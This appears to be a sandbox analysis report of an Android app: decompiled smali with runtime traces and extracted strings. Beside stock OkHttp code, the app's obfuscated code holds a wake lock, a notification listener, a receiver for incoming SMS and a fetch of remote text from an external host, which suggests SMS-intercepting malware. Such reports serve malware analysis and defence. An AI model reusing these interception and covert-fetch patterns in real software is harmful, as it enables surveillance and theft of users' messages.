                        197invoke-virtual {p1}, Lokhttp3/OkHttpClient$Builder;->getX509TrustManagerOrNull$okhttp()Ljavax/net/ssl/X509TrustManager;
                        198move-result-object v0
                        200invoke-static {v0}, Lkotlin/jvm/internal/Intrinsics;->checkNotNull(Ljava/lang/Object;)V
                        201iput-object v0, p0, Lokhttp3/OkHttpClient;->x509TrustManager:Ljavax/net/ssl/X509TrustManager;
                        203invoke-virtual {p1}, Lokhttp3/OkHttpClient$Builder;->getCertificatePinner$okhttp()Lokhttp3/CertificatePinner;
                        204move-result-object p1
                        206iget-object v0, p0, Lokhttp3/OkHttpClient;->certificateChainCleaner:Lokhttp3/internal/tls/CertificateChainCleaner;
                        208invoke-static {v0}, Lkotlin/jvm/internal/Intrinsics;->checkNotNull(Ljava/lang/Object;)V
                        210invoke-virtual {p1, v0}, Lokhttp3/CertificatePinner;->withCertificateChainCleaner$okhttp(Lokhttp3/internal/tls/CertificateChainCleaner;)Lokhttp3/CertificatePinner;
                        211move-result-object p1
                        212iput-object p1, p0, Lokhttp3/OkHttpClient;->certificatePinner:Lokhttp3/CertificatePinner;
                        213goto/16 :goto_174
                        214cond_13b:
                        215sget-object v0, Lokhttp3/internal/platform/Platform;->Companion:Lokhttp3/internal/platform/Platform$Companion;
                        217invoke-virtual {v0}, Lokhttp3/internal/platform/Platform$Companion;->get()Lokhttp3/internal/platform/Platform;
                        218move-result-object v0
                        220invoke-virtual {v0}, Lokhttp3/internal/platform/Platform;->platformTrustManager()Ljavax/net/ssl/X509TrustManager;
                        221move-result-object v0
                        222iput-object v0, p0, Lokhttp3/OkHttpClient;->x509TrustManager:Ljavax/net/ssl/X509TrustManager;
                        224sget-object v0, Lokhttp3/internal/platform/Platform;->Companion:Lokhttp3/internal/platform/Platform$Companion;
                        226invoke-virtual {v0}, Lokhttp3/internal/platform/Platform$Companion;->get()Lokhttp3/internal/platform/Platform;
                        227move-result-object v0
                        229iget-object v1, p0, Lokhttp3/OkHttpClient;->x509TrustManager:Ljavax/net/ssl/X509TrustManager;
                        231invoke-static {v1}, Lkotlin/jvm/internal/Intrinsics;->checkNotNull(Ljava/lang/Object;)V
                        233invoke-virtual {v0, v1}, Lokhttp3/internal/platform/Platform;->newSslSocketFactory(Ljavax/net/ssl/X509TrustManager;)Ljavax/net/ssl/SSLSocketFactory;
                        234move-result-object v0
                        235iput-object v0, p0, Lokhttp3/OkHttpClient;->sslSocketFactoryOrNull:Ljavax/net/ssl/SSLSocketFactory;
                        237sget-object v0, Lokhttp3/internal/tls/CertificateChainCleaner;->Companion:Lokhttp3/internal/tls/CertificateChainCleaner$Companion;
                        239iget-object v1, p0, Lokhttp3/OkHttpClient;->x509TrustManager:Ljavax/net/ssl/X509TrustManager;
                        241invoke-static {v1}, Lkotlin/jvm/internal/Intrinsics;->checkNotNull(Ljava/lang/Object;)V
                        243invoke-virtual {v0, v1}, Lokhttp3/internal/tls/CertificateChainCleaner$Companion;->get(Ljavax/net/ssl/X509TrustManager;)Lokhttp3/internal/tls/CertificateChainCleaner;
                        244move-result-object v0
                        245iput-object v0, p0, Lokhttp3/OkHttpClient;->certificateChainCleaner:Lokhttp3/internal/tls/CertificateChainCleaner;
                        247invoke-virtual {p1}, Lokhttp3/OkHttpClient$Builder;->getCertificatePinner$okhttp()Lokhttp3/CertificatePinner;
                        248move-result-object p1
                        250iget-object v0, p0, Lokhttp3/OkHttpClient;->certificateChainCleaner:Lokhttp3/internal/tls/CertificateChainCleaner;
                        252invoke-static {v0}, Lkotlin/jvm/internal/Intrinsics;->checkNotNull(Ljava/lang/Object;)V
                        254invoke-virtual {p1, v0}, Lokhttp3/CertificatePinner;->withCertificateChainCleaner$okhttp(Lokhttp3/internal/tls/CertificateChainCleaner;)Lokhttp3/CertificatePinner;
                        255move-result-object p1
                        256iput-object p1, p0, Lokhttp3/OkHttpClient;->certificatePinner:Lokhttp3/CertificatePinner;
                        257goto_174:
                        258invoke-direct {p0}, Lokhttp3/OkHttpClient;->verifyClientState()V
                        259return-void
                        Cross References
                        APIs
                        • java.util.ArrayList.<init>
                        • java.util.Collection.add
                        • java.util.Collection.add
                        • java.util.Collection.add
                        • java.util.Collection.add
                        • java.util.Collection.add
                        • java.io.IOException.<init>
                        • java.lang.NullPointerException.<init>
                        Strings
                        • Canceled
                        • null cannot be cast to non-null type kotlin.Throwable
                        Position Instruction Meta Information
                        0.annotation system Ldalvik/annotation/Throws;
                        1value = {
                        2Ljava/io/IOException;
                        3}
                        4.end annotation
                        5new-instance v0, Ljava/util/ArrayList;
                        7invoke-direct {v0}, Ljava/util/ArrayList;-><init>()V
                        8move-object v3, v0
                        9check-cast v3, Ljava/util/List;
                        10move-object v0, v3
                        11check-cast v0, Ljava/util/Collection;
                        13iget-object v1, p0, Lokhttp3/internal/connection/RealCall;->client:Lokhttp3/OkHttpClient;
                        15invoke-virtual {v1}, Lokhttp3/OkHttpClient;->interceptors()Ljava/util/List;
                        16move-result-object v1
                        17check-cast v1, Ljava/lang/Iterable;
                        19invoke-static {v0, v1}, Lkotlin/collections/CollectionsKt;->addAll(Ljava/util/Collection;Ljava/lang/Iterable;)Z
                        20new-instance v1, Lokhttp3/internal/http/RetryAndFollowUpInterceptor;
                        22iget-object v2, p0, Lokhttp3/internal/connection/RealCall;->client:Lokhttp3/OkHttpClient;
                        24invoke-direct {v1, v2}, Lokhttp3/internal/http/RetryAndFollowUpInterceptor;-><init>(Lokhttp3/OkHttpClient;)V
                        26invoke-interface {v0, v1}, Ljava/util/Collection;->add(Ljava/lang/Object;)Z
                        27new-instance v1, Lokhttp3/internal/http/BridgeInterceptor;
                        29iget-object v2, p0, Lokhttp3/internal/connection/RealCall;->client:Lokhttp3/OkHttpClient;
                        31invoke-virtual {v2}, Lokhttp3/OkHttpClient;->cookieJar()Lokhttp3/CookieJar;
                        32move-result-object v2
                        34invoke-direct {v1, v2}, Lokhttp3/internal/http/BridgeInterceptor;-><init>(Lokhttp3/CookieJar;)V
                        36invoke-interface {v0, v1}, Ljava/util/Collection;->add(Ljava/lang/Object;)Z
                        37new-instance v1, Lokhttp3/internal/cache/CacheInterceptor;
                        39iget-object v2, p0, Lokhttp3/internal/connection/RealCall;->client:Lokhttp3/OkHttpClient;
                        41invoke-virtual {v2}, Lokhttp3/OkHttpClient;->cache()Lokhttp3/Cache;
                        42move-result-object v2
                        44invoke-direct {v1, v2}, Lokhttp3/internal/cache/CacheInterceptor;-><init>(Lokhttp3/Cache;)V
                        46invoke-interface {v0, v1}, Ljava/util/Collection;->add(Ljava/lang/Object;)Z
                        48sget-object v1, Lokhttp3/internal/connection/ConnectInterceptor;->INSTANCE:Lokhttp3/internal/connection/ConnectInterceptor;
                        50invoke-interface {v0, v1}, Ljava/util/Collection;->add(Ljava/lang/Object;)Z
                        51iget-boolean v1, p0, Lokhttp3/internal/connection/RealCall;->forWebSocket:Z
                        52if-nez v1, :cond_50
                        54iget-object v1, p0, Lokhttp3/internal/connection/RealCall;->client:Lokhttp3/OkHttpClient;
                        56invoke-virtual {v1}, Lokhttp3/OkHttpClient;->networkInterceptors()Ljava/util/List;
                        57move-result-object v1
                        58check-cast v1, Ljava/lang/Iterable;
                        60invoke-static {v0, v1}, Lkotlin/collections/CollectionsKt;->addAll(Ljava/util/Collection;Ljava/lang/Iterable;)Z
                        61cond_50: new-instance v1, Lokhttp3/internal/http/CallServerInterceptor;
                        62iget-boolean v2, p0, Lokhttp3/internal/connection/RealCall;->forWebSocket:Z
                        64invoke-direct {v1, v2}, Lokhttp3/internal/http/CallServerInterceptor;-><init>(Z)V
                        66invoke-interface {v0, v1}, Ljava/util/Collection;->add(Ljava/lang/Object;)Z
                        67new-instance v0, Lokhttp3/internal/http/RealInterceptorChain;
                        68const/4 v4, 0x0
                        69const/4 v5, 0x0
                        71iget-object v6, p0, Lokhttp3/internal/connection/RealCall;->originalRequest:Lokhttp3/Request;
                        73iget-object v1, p0, Lokhttp3/internal/connection/RealCall;->client:Lokhttp3/OkHttpClient;
                        75invoke-virtual {v1}, Lokhttp3/OkHttpClient;->connectTimeoutMillis()I
                        76move-result v7
                        78iget-object v1, p0, Lokhttp3/internal/connection/RealCall;->client:Lokhttp3/OkHttpClient;
                        80invoke-virtual {v1}, Lokhttp3/OkHttpClient;->readTimeoutMillis()I
                        81move-result v8
                        83iget-object v1, p0, Lokhttp3/internal/connection/RealCall;->client:Lokhttp3/OkHttpClient;
                        85invoke-virtual {v1}, Lokhttp3/OkHttpClient;->writeTimeoutMillis()I
                        86move-result v9
                        87move-object v1, v0
                        88move-object v2, p0
                        90invoke-direct/range {v1 .. v9}, Lokhttp3/internal/http/RealInterceptorChain;-><init>(Lokhttp3/internal/connection/RealCall;Ljava/util/List;ILokhttp3/internal/connection/Exchange;Lokhttp3/Request;III)V
                        91const/4 v1, 0x0
                        92const/4 v2, 0x0
                        93try_start_79:
                        94iget-object v3, p0, Lokhttp3/internal/connection/RealCall;->originalRequest:Lokhttp3/Request;
                        96invoke-virtual {v0, v3}, Lokhttp3/internal/http/RealInterceptorChain;->proceed(Lokhttp3/Request;)Lokhttp3/Response;
                        97move-result-object v0
                        99invoke-virtual {p0}, Lokhttp3/internal/connection/RealCall;->isCanceled()Z
                        • Time: 700173
                          • This:
                            • okhttp3.internal.connection.RealCall@a6f051
                          • Return:
                            • false
                        100move-result v3
                        101try_end_83: if-nez v3, :cond_89
                        103invoke-virtual {p0, v2}, Lokhttp3/internal/connection/RealCall;->noMoreExchanges$okhttp(Ljava/io/IOException;)Ljava/io/IOException;
                        104return-object v0
                        105cond_89: check-cast v0, Ljava/io/Closeable;
                        107invoke-static {v0}, Lokhttp3/internal/Util;->closeQuietly(Ljava/io/Closeable;)V
                        108new-instance v0, Ljava/io/IOException;
                        110const-string v3, "Canceled"
                        112invoke-direct {v0, v3}, Ljava/io/IOException;-><init>(Ljava/lang/String;)V
                        113check-cast v0, Ljava/lang/Throwable;
                        114throw v0
                        115catchall_98: move-exception v0
                        116goto/16 :goto_ad
                        117catch_9a: move-exception v0
                        118const/4 v1, 0x1
                        119try_start_9c:
                        120invoke-virtual {p0, v0}, Lokhttp3/internal/connection/RealCall;->noMoreExchanges$okhttp(Ljava/io/IOException;)Ljava/io/IOException;
                        121move-result-object v0
                        122if-nez v0, :cond_aa
                        123new-instance v0, Ljava/lang/NullPointerException;
                        125const-string v3, "null cannot be cast to non-null type kotlin.Throwable"
                        127invoke-direct {v0, v3}, Ljava/lang/NullPointerException;-><init>(Ljava/lang/String;)V
                        128throw v0
                        129cond_aa: check-cast v0, Ljava/lang/Throwable;
                        130throw v0
                        131try_end_ad: if-nez v1, :cond_b2
                        133invoke-virtual {p0, v2}, Lokhttp3/internal/connection/RealCall;->noMoreExchanges$okhttp(Ljava/io/IOException;)Ljava/io/IOException;
                        134cond_b2: throw v0
                        Cross References
                        APIs
                        • com.MrXnxVip.global.httputils2service._vvvv7:Ljava/lang/String
                        • com.MrXnxVip.global.httputils2service._vvvv7:Ljava/lang/String
                        • com.MrXnxVip.global.httputils2service.processBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.httputils2service.processBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.httputils2service._vvvvvvvvvvvv1:Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper
                        • com.MrXnxVip.global.httputils2service._vvvvvvvvvvvv1:Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper
                        • com.MrXnxVip.global.httputils2service._vvvvvvvvvvv0:Lanywheresoftware/b4a/objects/collections/Map
                        Strings
                        • /data/user/0/com.MrXnxVip.global/cache
                        • test
                        • ~test.test
                        • 62621447
                        • 62621448
                        • Switching to File.DirInternal
                        • hc
                        Position Instruction Meta Information
                        0.annotation system Ldalvik/annotation/Throws;
                        1value = {
                        2Ljava/lang/Exception;
                        3}
                        4.end annotation
                        6const-string v0, "~test.test"
                        8sget-object v1, Lanywheresoftware/b4a/keywords/Common;->File:Lanywheresoftware/b4a/objects/streams/File;
                        10invoke-static {}, Lanywheresoftware/b4a/objects/streams/File;->getDirInternalCache()Ljava/lang/String;
                        • Time: 696953
                          • Return:
                            • /data/user/0/com.MrXnxVip.global/cache
                        11move-result-object v1
                        12sput-object v1, Lcom/MrXnxVip/global/httputils2service;->_vvvv7:Ljava/lang/String;
                        13try_start_a:
                        14sget-object v1, Lanywheresoftware/b4a/keywords/Common;->File:Lanywheresoftware/b4a/objects/streams/File;
                        16sget-object v1, Lcom/MrXnxVip/global/httputils2service;->_vvvv7:Ljava/lang/String;
                        18const-string v2, "test"
                        20invoke-static {v1, v0, v2}, Lanywheresoftware/b4a/objects/streams/File;->WriteString(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;)V
                        22sget-object v1, Lanywheresoftware/b4a/keywords/Common;->File:Lanywheresoftware/b4a/objects/streams/File;
                        24sget-object v1, Lcom/MrXnxVip/global/httputils2service;->_vvvv7:Ljava/lang/String;
                        26invoke-static {v1, v0}, Lanywheresoftware/b4a/objects/streams/File;->Delete(Ljava/lang/String;Ljava/lang/String;)Z
                        • Time: 696970
                          • This:
                            • /data/user/0/com.MrXnxVip.global/cache/~test.test
                          • p0: /data/user/0/com.MrXnxVip.global/cache
                          • p1: ~test.test
                          • Return:
                            • /data/user/0/com.MrXnxVip.global/cache/~test.test
                        • Time: 696975
                          • This:
                            • /data/user/0/com.MrXnxVip.global/cache/~test.test
                          • Return:
                            • true
                        27try_end_1a: goto/16 :goto_40
                        28catch_1b: move-exception v0
                        30sget-object v1, Lcom/MrXnxVip/global/httputils2service;->processBA:Lanywheresoftware/b4a/BA;
                        32invoke-virtual {v1, v0}, Lanywheresoftware/b4a/BA;->setLastException(Ljava/lang/Exception;)V
                        34sget-object v0, Lcom/MrXnxVip/global/httputils2service;->processBA:Lanywheresoftware/b4a/BA;
                        36invoke-static {v0}, Lanywheresoftware/b4a/keywords/Common;->LastException(Lanywheresoftware/b4a/BA;)Lanywheresoftware/b4a/objects/B4AException;
                        37move-result-object v0
                        39invoke-static {v0}, Lanywheresoftware/b4a/BA;->ObjectToString(Ljava/lang/Object;)Ljava/lang/String;
                        40move-result-object v0
                        42const-string v1, "62621447"
                        43const/4 v2, 0x0
                        45invoke-static {v1, v0, v2}, Lanywheresoftware/b4a/keywords/Common;->LogImpl(Ljava/lang/String;Ljava/lang/String;I)V
                        47const-string v0, "62621448"
                        49const-string v1, "Switching to File.DirInternal"
                        51invoke-static {v0, v1, v2}, Lanywheresoftware/b4a/keywords/Common;->LogImpl(Ljava/lang/String;Ljava/lang/String;I)V
                        53sget-object v0, Lanywheresoftware/b4a/keywords/Common;->File:Lanywheresoftware/b4a/objects/streams/File;
                        55invoke-static {}, Lanywheresoftware/b4a/objects/streams/File;->getDirInternal()Ljava/lang/String;
                        56move-result-object v0
                        57sput-object v0, Lcom/MrXnxVip/global/httputils2service;->_vvvv7:Ljava/lang/String;
                        58goto_40:
                        59sget-object v0, Lcom/MrXnxVip/global/httputils2service;->_vvvvvvvvvvvv1:Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper;
                        61invoke-virtual {v0}, Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper;->IsInitialized()Z
                        • Time: 696978
                          • This:
                            • anywheresoftware.b4h.okhttp.OkHttpClientWrapper@321e535
                          • Return:
                            • false
                        62move-result v0
                        63if-nez v0, :cond_4f
                        65sget-object v0, Lcom/MrXnxVip/global/httputils2service;->_vvvvvvvvvvvv1:Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper;
                        67const-string v1, "hc"
                        69invoke-virtual {v0, v1}, Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper;->Initialize(Ljava/lang/String;)V
                        • Time: 697142
                          • This:
                            • anywheresoftware.b4h.okhttp.OkHttpClientWrapper@321e535
                          • p0: hc
                        70cond_4f:
                        71sget-object v0, Lcom/MrXnxVip/global/httputils2service;->_vvvvvvvvvvv0:Lanywheresoftware/b4a/objects/collections/Map;
                        73invoke-virtual {v0}, Lanywheresoftware/b4a/objects/collections/Map;->Initialize()V
                        75const-string v0, ""
                        76return-object v0
                        APIs
                        • com.MrXnxVip.global.pnservices.processBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.pnservices.processBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.pnservices._vvvvvvvvvvv6:Lanywheresoftware/b4a/objects/NotificationListenerWrapper$NotificationListener
                        • com.MrXnxVip.global.pnservices.processBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.pnservices._vvvv3:LPNBroadcastReceiver/PNBrodcastReceiver
                        • com.MrXnxVip.global.pnservices.processBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.pnservices._vvvv3:LPNBroadcastReceiver/PNBrodcastReceiver
                        • com.MrXnxVip.global.pnservices._vvvv3:LPNBroadcastReceiver/PNBrodcastReceiver
                        • com.MrXnxVip.global.pnservices._vvvv3:LPNBroadcastReceiver/PNBrodcastReceiver
                        • com.MrXnxVip.global.pnservices._vvvv3:LPNBroadcastReceiver/PNBrodcastReceiver
                        • com.MrXnxVip.global.pnservices._vvvv3:LPNBroadcastReceiver/PNBrodcastReceiver
                        • com.MrXnxVip.global.pnservices.processBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.pnservices.processBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.pnservices.getObject
                        Strings
                        • listener
                        • pnreciver
                        • android.intent.action.SCREEN_ON
                        • android.intent.action.SCREEN_OFF
                        • android.intent.action.BATTERY_CHANGED
                        • android.provider.Telephony.SMS_RECEIVED
                        Position Instruction Meta Information
                        0.annotation system Ldalvik/annotation/Throws;
                        1value = {
                        2Ljava/lang/Exception;
                        3}
                        4.end annotation
                        5try_start_0:
                        6sget-object v0, Lcom/MrXnxVip/global/pnservices;->processBA:Lanywheresoftware/b4a/BA;
                        8invoke-static {v0}, Lanywheresoftware/b4a/phone/Phone$PhoneWakeState;->PartialLock(Lanywheresoftware/b4a/BA;)V
                        10sget-object v0, Lcom/MrXnxVip/global/pnservices;->processBA:Lanywheresoftware/b4a/BA;
                        11const/4 v1, 0x0
                        13invoke-static {v0, v1}, Lanywheresoftware/b4a/phone/Phone$PhoneWakeState;->KeepAlive(Lanywheresoftware/b4a/BA;Z)V
                        15sget-object v0, Lcom/MrXnxVip/global/pnservices;->_vvvvvvvvvvv6:Lanywheresoftware/b4a/objects/NotificationListenerWrapper$NotificationListener;
                        17sget-object v1, Lcom/MrXnxVip/global/pnservices;->processBA:Lanywheresoftware/b4a/BA;
                        19const-string v2, "listener"
                        21invoke-virtual {v0, v1, v2}, Lanywheresoftware/b4a/objects/NotificationListenerWrapper$NotificationListener;->Initialize(Lanywheresoftware/b4a/BA;Ljava/lang/String;)V
                        23sget-object v0, Lcom/MrXnxVip/global/pnservices;->_vvvv3:LPNBroadcastReceiver/PNBrodcastReceiver;
                        25sget-object v1, Lcom/MrXnxVip/global/pnservices;->processBA:Lanywheresoftware/b4a/BA;
                        27const-string v2, "pnreciver"
                        29invoke-virtual {v0, v1, v2}, LPNBroadcastReceiver/PNBrodcastReceiver;->Initialize(Lanywheresoftware/b4a/BA;Ljava/lang/String;)V
                        31sget-object v0, Lcom/MrXnxVip/global/pnservices;->_vvvv3:LPNBroadcastReceiver/PNBrodcastReceiver;
                        33const-string v1, "android.intent.action.SCREEN_ON"
                        35invoke-virtual {v0, v1}, LPNBroadcastReceiver/PNBrodcastReceiver;->AddAction(Ljava/lang/String;)V
                        • Time: 812178
                          • This:
                            • PNBroadcastReceiver.PNBrodcastReceiver@2fcb1da
                          • p0: android.intent.action.SCREEN_ON
                        37sget-object v0, Lcom/MrXnxVip/global/pnservices;->_vvvv3:LPNBroadcastReceiver/PNBrodcastReceiver;
                        39const-string v1, "android.intent.action.SCREEN_OFF"
                        41invoke-virtual {v0, v1}, LPNBroadcastReceiver/PNBrodcastReceiver;->AddAction(Ljava/lang/String;)V
                        • Time: 812179
                          • This:
                            • PNBroadcastReceiver.PNBrodcastReceiver@2fcb1da
                          • p0: android.intent.action.SCREEN_OFF
                        43sget-object v0, Lcom/MrXnxVip/global/pnservices;->_vvvv3:LPNBroadcastReceiver/PNBrodcastReceiver;
                        45const-string v1, "android.intent.action.BATTERY_CHANGED"
                        47invoke-virtual {v0, v1}, LPNBroadcastReceiver/PNBrodcastReceiver;->AddAction(Ljava/lang/String;)V
                        • Time: 812180
                          • This:
                            • PNBroadcastReceiver.PNBrodcastReceiver@2fcb1da
                          • p0: android.intent.action.BATTERY_CHANGED
                        49sget-object v0, Lcom/MrXnxVip/global/pnservices;->_vvvv3:LPNBroadcastReceiver/PNBrodcastReceiver;
                        51const-string v1, "android.provider.Telephony.SMS_RECEIVED"
                        53invoke-virtual {v0, v1}, LPNBroadcastReceiver/PNBrodcastReceiver;->AddAction(Ljava/lang/String;)V
                        • Time: 812181
                          • This:
                            • PNBroadcastReceiver.PNBrodcastReceiver@2fcb1da
                          • p0: android.provider.Telephony.SMS_RECEIVED
                        55sget-object v0, Lcom/MrXnxVip/global/pnservices;->_vvvv3:LPNBroadcastReceiver/PNBrodcastReceiver;
                        57invoke-virtual {v0}, LPNBroadcastReceiver/PNBrodcastReceiver;->RegisterReceiver()V
                        58try_end_3e: goto/16 :goto_4e
                        59catch_3f: move-exception v0
                        61sget-object v1, Lcom/MrXnxVip/global/pnservices;->processBA:Lanywheresoftware/b4a/BA;
                        63invoke-virtual {v1, v0}, Lanywheresoftware/b4a/BA;->setLastException(Ljava/lang/Exception;)V
                        65sget-object v0, Lcom/MrXnxVip/global/pnservices;->processBA:Lanywheresoftware/b4a/BA;
                        67invoke-static {}, Lcom/MrXnxVip/global/pnservices;->getObject()Ljava/lang/Class;
                        68move-result-object v1
                        70invoke-static {v0, v1}, Lanywheresoftware/b4a/keywords/Common;->StartService(Lanywheresoftware/b4a/BA;Ljava/lang/Object;)V
                        71goto_4e:
                        72const-string v0, ""
                        73return-object v0
                        Cross References
                        APIs
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • com.MrXnxVip.global.httputils2service.getObject
                        Strings
                        • https://ssd-vip.website/lord/web.txt
                        • Invalid link:
                        • 94063237
                        • SubmitJob
                        Position Instruction Meta Information
                        0.annotation system Ldalvik/annotation/Throws;
                        1value = {
                        2Ljava/lang/Exception;
                        3}
                        4.end annotation
                        6const-string v0, ""
                        7try_start_2:
                        8invoke-virtual {p0, p1}, Lcom/MrXnxVip/global/httpjob;->_vvvvv1(Ljava/lang/String;)Ljava/lang/String;
                        9move-result-object p1
                        11iget-object v1, p0, Lcom/MrXnxVip/global/httpjob;->_vvvvvvvvv1:Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper$OkHttpRequest;
                        13invoke-virtual {v1, p1}, Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper$OkHttpRequest;->InitializeGet(Ljava/lang/String;)V
                        • Time: 695412
                          • This:
                            • anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpRequest@11d2117
                          • p0: https://ssd-vip.website/lord/web.txt
                        14try_end_b: goto/16 :goto_37
                        15catch_c: move-exception v1
                        17iget-object v2, p0, Lcom/MrXnxVip/global/httpjob;->ba:Lanywheresoftware/b4a/BA;
                        19invoke-virtual {v2, v1}, Lanywheresoftware/b4a/BA;->setLastException(Ljava/lang/Exception;)V
                        20new-instance v1, Ljava/lang/StringBuilder;
                        22invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        24const-string v2, "Invalid link: "
                        26invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        28invoke-static {v0, p1}, Lanywheresoftware/b4a/keywords/Common;->SmartStringFormatter(Ljava/lang/String;Ljava/lang/Object;)Ljava/lang/String;
                        29move-result-object p1
                        31invoke-virtual {v1, p1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        33invoke-virtual {v1, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        35invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        36move-result-object p1
                        37const/4 v1, 0x0
                        39const-string v2, "94063237"
                        41invoke-static {v2, p1, v1}, Lanywheresoftware/b4a/keywords/Common;->LogImpl(Ljava/lang/String;Ljava/lang/String;I)V
                        43iget-object p1, p0, Lcom/MrXnxVip/global/httpjob;->_vvvvvvvvv1:Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper$OkHttpRequest;
                        45iget-object v1, p0, Lcom/MrXnxVip/global/httpjob;->_vvvvvvvvv4:Ljava/lang/String;
                        47invoke-virtual {p1, v1}, Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper$OkHttpRequest;->InitializeGet(Ljava/lang/String;)V
                        48goto_37:
                        49iget-object p1, p0, Lcom/MrXnxVip/global/httpjob;->ba:Lanywheresoftware/b4a/BA;
                        51invoke-static {}, Lcom/MrXnxVip/global/httputils2service;->getObject()Ljava/lang/Class;
                        52move-result-object v1
                        54const-string v2, "SubmitJob"
                        56invoke-static {p1, v1, v2, p0}, Lanywheresoftware/b4a/keywords/Common;->CallSubDelayed2(Lanywheresoftware/b4a/BA;Ljava/lang/Object;Ljava/lang/String;Ljava/lang/Object;)V
                        57return-object v0
                        Cross References
                        APIs
                        • java.util.List.get
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.net.SocketException.<init>
                        Strings
                        • No route to
                        • ; exhausted proxy configurations:
                        Position Instruction Meta Information
                        0.annotation system Ldalvik/annotation/Throws;
                        1value = {
                        2Ljava/io/IOException;
                        3}
                        4.end annotation
                        6invoke-direct {p0}, Lokhttp3/internal/connection/RouteSelector;->hasNextProxy()Z
                        • Time: 697770
                          • This:
                            • okhttp3.internal.connection.RouteSelector@e5f6581
                          • Return:
                            • true
                        7move-result v0
                        8if-eqz v0, :cond_18
                        10iget-object v0, p0, Lokhttp3/internal/connection/RouteSelector;->proxies:Ljava/util/List;
                        11iget v1, p0, Lokhttp3/internal/connection/RouteSelector;->nextProxyIndex:I
                        12add-int/lit8 v2, v1, 0x1
                        13iput v2, p0, Lokhttp3/internal/connection/RouteSelector;->nextProxyIndex:I
                        15invoke-interface {v0, v1}, Ljava/util/List;->get(I)Ljava/lang/Object;
                        16move-result-object v0
                        17check-cast v0, Ljava/net/Proxy;
                        19invoke-direct {p0, v0}, Lokhttp3/internal/connection/RouteSelector;->resetNextInetSocketAddress(Ljava/net/Proxy;)V
                        20return-object v0
                        21cond_18: new-instance v0, Ljava/net/SocketException;
                        22new-instance v1, Ljava/lang/StringBuilder;
                        24invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        26const-string v2, "No route to "
                        28invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        30iget-object v2, p0, Lokhttp3/internal/connection/RouteSelector;->address:Lokhttp3/Address;
                        32invoke-virtual {v2}, Lokhttp3/Address;->url()Lokhttp3/HttpUrl;
                        33move-result-object v2
                        35invoke-virtual {v2}, Lokhttp3/HttpUrl;->host()Ljava/lang/String;
                        36move-result-object v2
                        38invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        40const-string v2, "; exhausted proxy configurations: "
                        42invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        44iget-object v2, p0, Lokhttp3/internal/connection/RouteSelector;->proxies:Ljava/util/List;
                        46invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        48invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        49move-result-object v1
                        51invoke-direct {v0, v1}, Ljava/net/SocketException;-><init>(Ljava/lang/String;)V
                        52check-cast v0, Ljava/lang/Throwable;
                        53throw v0
                        Cross References
                        APIs
                        • com.MrXnxVip.global.main.vvv13
                        • java.lang.StringBuilder.<init>
                        • com.MrXnxVip.global.main.vvv13
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        Strings
                        • AssetsDir
                        • UTF8
                        • port.txt
                        • https://ssd-vip.website/
                        Position Instruction Meta Information
                        0.annotation system Ldalvik/annotation/Throws;
                        1value = {
                        2Ljava/lang/Exception;
                        3}
                        4.end annotation
                        6sget-object v0, Lanywheresoftware/b4a/keywords/Common;->File:Lanywheresoftware/b4a/objects/streams/File;
                        8sget-object v0, Lanywheresoftware/b4a/keywords/Common;->File:Lanywheresoftware/b4a/objects/streams/File;
                        10invoke-static {}, Lanywheresoftware/b4a/objects/streams/File;->getDirAssets()Ljava/lang/String;
                        • Time: 685755
                          • Return:
                            • AssetsDir
                        11move-result-object v0
                        12const/16 v1, 0x8
                        13new-array v1, v1, [B
                        14fill-array-data v1, :array_40
                        15const v2, 0xc64b5
                        17invoke-static {v1, v2}, Lcom/MrXnxVip/global/main;->vvv13([BI)Ljava/lang/String;
                        • Time: 685759
                          • This:
                            • port.txt
                          • p0: [B@fa16e9c
                          • p0: port.txt
                          • p0: 706F72742E747874
                          • p1: SHA-1
                          • Return:
                            • port.txt
                        • Time: 824335
                          • This:
                            • port.txt
                          • p0: [B@aa76177
                          • p0: port.txt
                          • p0: 706F72742E747874
                          • p1: UTF8
